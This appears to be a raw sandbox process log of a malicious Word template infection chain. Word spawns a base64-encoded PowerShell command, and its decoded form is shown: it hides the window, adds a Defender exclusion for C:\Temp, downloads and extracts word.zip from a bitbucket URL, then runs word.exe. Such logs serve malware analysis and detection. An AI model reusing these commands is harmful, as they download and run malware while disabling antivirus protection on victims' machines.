WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\fasdqweqw.dotm
1212powershell.exe powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAGIAeQBwAGEAcwBzACAALQBuAG8AcAByAG8AZgBpAGwAZQAgAC0AdwBpAG4AZABvAHcAcwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiAE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBJAHQAZQBtAFQAeQBwAGUAIABEAGkAcgBlAGMAdABvAHIAeQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAnAEMAOgBcAFQAZQBtAHAAXAAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAaQB0AGIAdQBjAGsAZQB0AC4AbwByAGcALwB4ADkAOAA5ADgAOQAvADgANgA3ADgANgA3ADgAZgBmAC8AZABvAHcAbgBsAG8AYQBkAHMALwB3AG8AcgBkAC4AegBpAHAAJwAsACcAQwA6AFwAXABUAGUAbQBwAFwAXABOAGUAdwBmAGkAbABlAC4AegBpAHAAJwApADsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAALQBQAGEAdABoACAAJwBDADoAXABcAFQAZQBtAHAAXABcAE4AZQB3AGYAaQBsAGUALgB6AGkAcAAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAXABUAGUAbQBwAFwAXAAnACAALQBGAG8AcgBjAGUAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAYwBtAGQALgBlAHgAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAnAC8AYwAgAEMAOgBcAFwAVABlAG0AcABcAFwAdwBvAHIAZAAuAGUAeABlACcAIgA=
2224powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command "New-Item -Path 'C:\\Temp\\' -ItemType Directory;Add-MpPreference -ExclusionPath 'C:\Temp\';(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/x98989/8678678ff/downloads/word.zip','C:\\Temp\\Newfile.zip');Expand-Archive -Path 'C:\\Temp\\Newfile.zip' -DestinationPath 'C:\\Temp\\' -Force;Start-Process cmd.exe -ArgumentList '/c C:\\Temp\\word.exe'"
2376cmd.exe "C:\Windows\system32\cmd.exe" /c C:\\Temp\\word.exe
2548